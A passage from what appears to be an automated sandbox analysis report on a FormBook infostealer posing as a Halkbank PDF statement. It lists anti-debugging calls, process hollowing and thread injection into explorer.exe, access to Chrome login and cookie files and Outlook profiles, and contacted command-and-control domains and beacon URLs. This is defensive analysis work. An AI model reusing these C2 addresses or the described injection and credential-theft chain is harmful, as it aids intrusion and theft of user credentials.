          Source: explorer.exe, 00000004.00000003.272248939.0000000007166000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000004.00000002.524345410.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000004.00000002.524345410.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
          Source: explorer.exe, 00000004.00000000.267285936.0000000008FD3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
          Source: explorer.exe, 00000004.00000003.475970402.000000000509E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
          Source: explorer.exe, 00000004.00000000.267285936.0000000008FD3000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeCode function: 1_2_01196515 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_01196515
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeCode function: 1_2_0119546E GetProcessHeap,1_2_0119546E
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeCode function: 1_2_01192D34 mov eax, dword ptr fs:[00000030h]1_2_01192D34
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeCode function: 1_2_01196ECB mov eax, dword ptr fs:[00000030h]1_2_01196ECB
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeCode function: 1_2_009F005F mov eax, dword ptr fs:[00000030h]1_2_009F005F
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeCode function: 1_2_009F0109 mov eax, dword ptr fs:[00000030h]1_2_009F0109
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeCode function: 1_2_009F013E mov eax, dword ptr fs:[00000030h]1_2_009F013E
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeCode function: 1_2_009F017B mov eax, dword ptr fs:[00000030h]1_2_009F017B
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeCode function: 3_2_01192D34 mov eax, dword ptr fs:[00000030h]3_2_01192D34
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeCode function: 3_2_01196ECB mov eax, dword ptr fs:[00000030h]3_2_01196ECB
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeCode function: 3_2_0040CF23 LdrLoadDll,3_2_0040CF23
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeCode function: 1_2_01191B25 SetUnhandledExceptionFilter,1_2_01191B25
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeCode function: 1_2_01196515 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_01196515
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeCode function: 1_2_0119202D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0119202D
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeCode function: 1_2_01191B31 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_01191B31
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeCode function: 3_2_0119202D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0119202D
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeCode function: 3_2_01191B31 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_01191B31
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeCode function: 3_2_01191B25 SetUnhandledExceptionFilter,3_2_01191B25
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeCode function: 3_2_01196515 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_01196515

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 107.148.8.96 80Jump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 194.102.227.30 80Jump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeDomain query: www.cutgang.net
          Source: C:\Windows\explorer.exeDomain query: www.wenzid4.top
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeSection unmapped: C:\Windows\SysWOW64\explorer.exe base address: 110000Jump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeSection loaded: unknown target: C:\Users\user\AppData\Local\Temp\dlcmto.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeThread register set: target process: 3452Jump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeThread register set: target process: 3452Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeProcess created: C:\Users\user\AppData\Local\Temp\dlcmto.exe C:\Users\user\AppData\Local\Temp\dlcmto.exeJump to behavior
          Source: explorer.exe, 00000004.00000002.514818678.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.259143664.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program ManagerT7<=ge
          Source: dlcmto.exe, 00000003.00000002.298566027.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, dlcmto.exe, 00000003.00000003.295506856.0000000003001000.00000004.00000020.00020000.00000000.sdmp, dlcmto.exe, 00000003.00000003.294435514.0000000002C80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000002.514818678.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.259143664.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: dlcmto.exe, 00000003.00000002.298566027.0000000002C80000.00000040.10000000.00040000.00000000.sdmp, dlcmto.exe, 00000003.00000003.295506856.0000000003001000.00000004.00000020.00020000.00000000.sdmp, dlcmto.exe, 00000003.00000003.294435514.0000000002C80000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Microsoft-Reserved-24C26ACC-DE62-4303-88AD-6CD4F1447F18SecurityConfigureWindowsPasswordsProxy DesktopProgmanSoftware\Microsoft\Windows NT\CurrentVersion\WinlogonShellSoftware\Microsoft\Windows NT\CurrentVersion\Winlogon\AlternateShells\AvailableShells
          Source: explorer.exe, 00000004.00000002.513559478.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.258690717.0000000001378000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CProgmanile
          Source: explorer.exe, 00000004.00000002.514818678.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.259143664.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeCode function: 1_2_01191D45 cpuid 1_2_01191D45
          Source: C:\Users\user\AppData\Local\Temp\dlcmto.exeCode function: 1_2_01191A08 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,1_2_01191A08
          Source: C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.dlcmto.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.dlcmto.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.297238970.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.297682899.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.517154599.0000000004450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.297724728.0000000000FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.515846426.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.517245778.0000000004480000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\SysWOW64\explorer.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.dlcmto.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.dlcmto.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.297238970.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.297682899.0000000000F40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.517154599.0000000004450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.297724728.0000000000FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.515846426.00000000025B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.517245778.0000000004480000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Native API          		Path Interception1
          Access Token Manipulation          		1
          Deobfuscate/Decode Files or Information          		1
          OS Credential Dumping          		1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		Exfiltration Over Other Network Medium3
          Ingress Tool Transfer          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default Accounts1
          Shared Modules          		Boot or Logon Initialization Scripts512
          Process Injection          		2
          Obfuscated Files or Information          		LSASS Memory2
          File and Directory Discovery          		Remote Desktop Protocol1
          Data from Local System          		Exfiltration Over Bluetooth1
          Encrypted Channel          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
          Software Packing          		Security Account Manager16
          System Information Discovery          		SMB/Windows Admin Shares1
          Email Collection          		Automated Exfiltration3
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
          Masquerading          		NTDS131
          Security Software Discovery          		Distributed Component Object Model1
          Clipboard Data          		Scheduled Transfer3
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
          Virtualization/Sandbox Evasion          		LSA Secrets2
          Virtualization/Sandbox Evasion          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          Access Token Manipulation          		Cached Domain Credentials2
          Process Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items512
          Process Injection          		DCSync1
          Application Window Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
          Remote System Discovery          		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 814000 Sample: Halkbank_Ekstre_20191102_07... Startdate: 23/02/2023 Architecture: WINDOWS Score: 100 42 Snort IDS alert for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Antivirus detection for URL or domain 2->46 48 3 other signatures 2->48 9 Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe 19 2->9         started        process3 file4 30 C:\Users\user\AppData\Local\Temp\dlcmto.exe, PE32 9->30 dropped 12 dlcmto.exe 1 9->12         started        process5 signatures6 60 Multi AV Scanner detection for dropped file 12->60 62 Machine Learning detection for dropped file 12->62 64 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 12->64 66 Maps a DLL or memory area into another process 12->66 15 dlcmto.exe 12->15         started        18 conhost.exe 12->18         started        process7 signatures8 68 Modifies the context of a thread in another process (thread injection) 15->68 70 Maps a DLL or memory area into another process 15->70 72 Sample uses process hollowing technique 15->72 74 Queues an APC in another process (thread injection) 15->74 20 explorer.exe 2 6 15->20 injected process9 dnsIp10 32 cutgang.net 194.102.227.30, 80 VODAFONE_ROCharlesdeGaullenr15RO Romania 20->32 34 www.wenzid4.top 107.148.8.96, 49699, 80 PEGTECHINCUS United States 20->34 36 www.cutgang.net 20->36 50 System process connects to network (likely due to code injection or exploit) 20->50 24 explorer.exe 13 20->24         started        28 autoconv.exe 20->28         started        signatures11 process12 dnsIp13 38 www.cutgang.net 24->38 40 cutgang.net 24->40 52 System process connects to network (likely due to code injection or exploit) 24->52 54 Tries to steal Mail credentials (via file / registry access) 24->54 56 Tries to harvest and steal browser information (history, passwords, etc) 24->56 58 2 other signatures 24->58 signatures14

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe31%ReversingLabsWin32.Trojan.Nsisx
          Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\dlcmto.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\dlcmto.exe23%ReversingLabsWin32.Trojan.Razy

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          9.2.explorer.exe.110000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          1.2.dlcmto.exe.d50000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          3.2.dlcmto.exe.2c80000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          3.2.dlcmto.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.fluxgreenn.space0%Avira URL Cloudsafe
          http://www.bemmulher.online0%Avira URL Cloudsafe
          http://www.cutgang.net/ghii/0%Avira URL Cloudsafe
          http://www.sem-jobs.com/ghii/0%Avira URL Cloudsafe
          http://www.sem-jobs.com0%Avira URL Cloudsafe
          http://www.yeah-go.com/ghii/0%Avira URL Cloudsafe
          http://www.cutgang.net/Bj0%Avira URL Cloudsafe
          http://www.ixirwholesale.xyz/ghii/0%Avira URL Cloudsafe
          http://www.cutgang.net0%Avira URL Cloudsafe
          http://www.de-nagel.com/ghii/0%Avira URL Cloudsafe
          http://www.nortonseecurity.com/ghii/0%Avira URL Cloudsafe
          http://www.7dkjhk.com/ghii/100%Avira URL Cloudmalware
          http://www.hubyazilim.com/ghii/100%Avira URL Cloudmalware
          http://www.genuineinsights.cloud/ghii/100%Avira URL Cloudmalware
          http://www.ladybillplanet.com/ghii/100%Avira URL Cloudmalware
          http://www.energybig.xyz100%Avira URL Cloudmalware
          http://www.octohoki.net/ghii/100%Avira URL Cloudmalware
          http://www.octohoki.net100%Avira URL Cloudmalware
          http://www.assilajamiart.com/ghii/0%Avira URL Cloudsafe
          http://www.genuineinsights.cloud100%Avira URL Cloudphishing
          http://www.de-nagel.com0%Avira URL Cloudsafe
          http://www.wenzid4.top0%Avira URL Cloudsafe
          http://www.wenzid4.top/ghii/100%Avira URL Cloudmalware
          http://www.wenzid4.top/ghii/?XdZ7vzmO=MOY5/0rZkCSn1x8B5kGxcu4kjN12BC26NMBU4rUAiJ09dU/WDm+Fx0Du9tK3DtQGeLOXEwxSHBLi0tUrRAF6AjHy/cvLKIMIEQ==&IM4=qwV6CUVoIAuPXv100%Avira URL Cloudmalware
          http://www.7dkjhk.com0%Avira URL Cloudsafe
          http://www.energybig.xyz/ghii/100%Avira URL Cloudmalware
          http://www.cutgang.net/ghii/?XdZ7vzmO=ZjEpLe7oxQ70uLnf6hiyuc6pu0EMckSA0PTIEH8mULBl4PD4NIfksCJCZa9jgf0%Avira URL Cloudsafe
          http://www.assilajamiart.com0%Avira URL Cloudsafe
          http://www.ladybillplanet.com0%Avira URL Cloudsafe
          http://www.fluxgreenn.space/ghii/0%Avira URL Cloudsafe
          http://www.ixirwholesale.xyz0%Avira URL Cloudsafe
          http://www.yeah-go.com0%Avira URL Cloudsafe
          http://www.nortonseecurity.com0%Avira URL Cloudsafe
          http://www.bemmulher.online/ghii/0%Avira URL Cloudsafe
          http://www.hubyazilim.com0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          cutgang.net
          		194.102.227.30
          		truetrue
            		unknown
            www.wenzid4.top
            		107.148.8.96
            		truetrue
              		unknown
              www.cutgang.net
              		unknown
              		unknowntrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://www.wenzid4.top/ghii/?XdZ7vzmO=MOY5/0rZkCSn1x8B5kGxcu4kjN12BC26NMBU4rUAiJ09dU/WDm+Fx0Du9tK3DtQGeLOXEwxSHBLi0tUrRAF6AjHy/cvLKIMIEQ==&IM4=qwV6CUVoIAuPXvtrue
                • Avira URL Cloud: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://www.fluxgreenn.spaceexplorer.exe, 00000004.00000003.473047459.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.526996565.000000000F52A000.00000004.00000001.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000004.00000003.273579499.000000000F276000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.526428626.000000000F270000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.268677971.000000000F276000.00000004.00000001.00020000.00000000.sdmpfalse
                  		high
                  http://www.bemmulher.onlineexplorer.exe, 00000004.00000003.473047459.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.526996565.000000000F52A000.00000004.00000001.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://duckduckgo.com/chrome_newtabexplorer.exe, 00000009.00000003.353036746.0000000007371000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.9.drfalse
                    		high
                    http://www.cutgang.net/ghii/explorer.exe, 00000004.00000002.526996565.000000000F52A000.00000004.00000001.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    https://duckduckgo.com/ac/?q=-912K03JO.9.drfalse
                      		high
                      http://www.hubyazilim.com/ghii/explorer.exe, 00000004.00000002.526996565.000000000F52A000.00000004.00000001.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      		unknown
                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoexplorer.exe, 00000009.00000003.353036746.0000000007371000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.9.drfalse
                        		high
                        http://www.7dkjhk.com/ghii/explorer.exe, 00000004.00000002.526996565.000000000F52A000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        http://www.octohoki.net/ghii/explorer.exe, 00000004.00000002.526996565.000000000F52A000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        http://www.sem-jobs.comexplorer.exe, 00000004.00000003.473047459.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.526996565.000000000F52A000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.sem-jobs.com/ghii/explorer.exe, 00000004.00000002.526996565.000000000F52A000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.yeah-go.com/ghii/explorer.exe, 00000004.00000002.526996565.000000000F52A000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.energybig.xyzexplorer.exe, 00000004.00000003.473047459.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.526996565.000000000F52A000.00000004.00000001.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: malware
                        		unknown
                        https://search.yahoo.com?fr=crmas_sfpfexplorer.exe, 00000009.00000003.353036746.0000000007371000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.9.drfalse
                          		high
                          http://www.cutgang.net/Bjexplorer.exe, 00000009.00000002.519305983.000000000737D000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.ixirwholesale.xyz/ghii/explorer.exe, 00000004.00000002.526996565.000000000F52A000.00000004.00000001.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=-912K03JO.9.drfalse
                            		high
                            https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchexplorer.exe, 00000009.00000003.353036746.0000000007371000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.9.drfalse
                              		high
                              http://nsis.sf.net/NSIS_ErrorErrorHalkbank_Ekstre_20191102_073809_405251-PDF.com.exefalse
                                		high
                                http://www.ladybillplanet.com/ghii/explorer.exe, 00000004.00000002.526996565.000000000F52A000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.cutgang.netexplorer.exe, 00000004.00000003.473047459.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.526996565.000000000F52A000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.genuineinsights.cloud/ghii/explorer.exe, 00000004.00000002.526996565.000000000F52A000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.de-nagel.com/ghii/explorer.exe, 00000004.00000002.526996565.000000000F52A000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=explorer.exe, 00000009.00000003.353036746.0000000007371000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.9.drfalse
                                  		high
                                  http://www.nortonseecurity.com/ghii/explorer.exe, 00000004.00000002.526996565.000000000F52A000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.octohoki.netexplorer.exe, 00000004.00000003.473047459.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.526996565.000000000F52A000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  		unknown
                                  https://ac.ecosia.org/autocomplete?q=-912K03JO.9.drfalse
                                    		high
                                    https://search.yahoo.com?fr=crmas_sfpexplorer.exe, 00000009.00000003.353036746.0000000007371000.00000004.00000020.00020000.00000000.sdmp, -912K03JO.9.drfalse
                                      		high
                                      http://www.assilajamiart.com/ghii/explorer.exe, 00000004.00000002.526996565.000000000F52A000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.genuineinsights.cloudexplorer.exe, 00000004.00000003.473047459.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.526996565.000000000F52A000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: phishing
                                      		unknown
                                      http://www.wenzid4.topexplorer.exe, 00000004.00000003.473047459.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.526996565.000000000F52A000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.7dkjhk.comexplorer.exe, 00000004.00000003.473047459.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.526996565.000000000F52A000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.wenzid4.top/ghii/explorer.exe, 00000004.00000002.526996565.000000000F52A000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      		unknown
                                      http://www.cutgang.net/ghii/?XdZ7vzmO=ZjEpLe7oxQ70uLnf6hiyuc6pu0EMckSA0PTIEH8mULBl4PD4NIfksCJCZa9jgfexplorer.exe, 00000009.00000002.519305983.000000000737D000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.de-nagel.comexplorer.exe, 00000004.00000003.473047459.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.526996565.000000000F52A000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.energybig.xyz/ghii/explorer.exe, 00000004.00000002.526996565.000000000F52A000.00000004.00000001.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: malware
                                      		unknown
